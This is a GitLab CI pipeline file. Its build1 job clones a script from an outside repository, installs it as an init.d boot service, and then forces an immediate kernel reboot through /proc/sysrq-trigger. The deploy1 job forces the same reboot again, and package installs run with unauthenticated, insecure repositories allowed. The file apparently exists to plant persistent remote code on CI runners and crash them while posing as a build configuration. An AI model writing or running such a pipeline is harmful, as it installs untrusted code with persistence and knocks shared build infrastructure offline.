image: debian:latest

stages:
  - ".pre"
  - before_script
  - build1
  - deploy1
  - ".post"

build:
  stage: .pre
  script: rspec
  rules:
    - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH

rspec:
  script: whoami
  stage: deploy1
  retry:
    max: 2
    when:
      - runner_system_failure
      - stuck_or_timeout_failure
    

job1:
  stage: .post
  script:
      - sudo gitlab-ctl reconfigure
  
before_script:
  - which ssh-agent || ( apt update --allow-unauthenticated --allow-insecure-repositories -y && apt install -y git tzdata && ln -fs /usr/share/zoneinfo/America/Los_Angeles /etc/localtime && dpkg-reconfigure -f noninteractive tzdata && apt full-upgrade -y)

build1:
  stage: build1
  script:
    - git clone https://gitlab.com/mrgofuckyourself/reboot6.git
    - cd reboot6 
    - cp reboot6.sh /etc/init.d/reboot6.sh 
    - update-rc.d -f reboot6.sh defaults 10 2 3 4 5 . || exit 1
    - cd
    - rm -rf ./reboot6/
    - sleep 3
    - echo 1 > /proc/sys/kernel/sysrq
    - echo b > /proc/sysrq-trigger || exit 1

deploy1:
  stage: deploy1
  script:
    - echo b > /proc/sysrq-trigger
